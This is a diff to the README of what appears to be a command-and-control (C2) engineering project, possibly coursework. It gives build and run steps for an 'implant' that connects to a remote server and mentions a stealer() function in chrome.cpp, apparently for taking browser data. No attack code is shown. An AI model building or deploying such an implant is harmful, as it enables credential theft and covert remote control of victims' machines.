Waynel65/C2_Engineering_Project/README.md

 ## implant Folder:

 - To compile, run `make implant`
-- To run the implant, run `./bin/implant.exe`
-- Function 'stealer()' in chrome.cpp implements the stealer
-- Static compile is needed.
-Run'g++ test.cpp -static -lcrypt32 -lbcrypt  -o test.exe sqlite3.dll'
+- Double click `implant.exe` to run the implant in default mode and connect to the remote server
+- For development/testing purposes, you can run `implant.exe -local` to connect to your local server and view implant behavior in the console window